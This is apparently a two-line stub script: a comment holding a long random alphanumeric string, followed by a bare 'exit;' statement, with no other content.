# CHCxZbSoai6eDukmXOiBUwPHXQMroy9eciWrU4WqkpLbPOydQMQ6pRpGI8TWxslL3xJegbwpjiQg3WRaJirBgHe5eBw2lJmycWmUQvMiQ3wPSj8USylmrz8Cssfs1AmG0kpoEkw0ExuHVuEAdROB1Fg7etAHneyFBfv5ROdRhS08uH0JTRiJkQJ6l2fGhs833dCLI70v3EA70MFDtvZQ0DPBUy3UYGH54SLgqBLI7E641Mdk9XPodmhrb2tkHYftq9EIffCIzDXE4HiSqrcjSrpWSpCMrIsrzGKUDcNMGFn0lteNdcvKtww3TfW6CWjcmPggNx3FZXMMYg6pcJzMCIIt3AlruVwezc22zw0FjBPcE5qnXhu4z9IoVZUPo8BoLmz6g403e7nXxaOS
exit;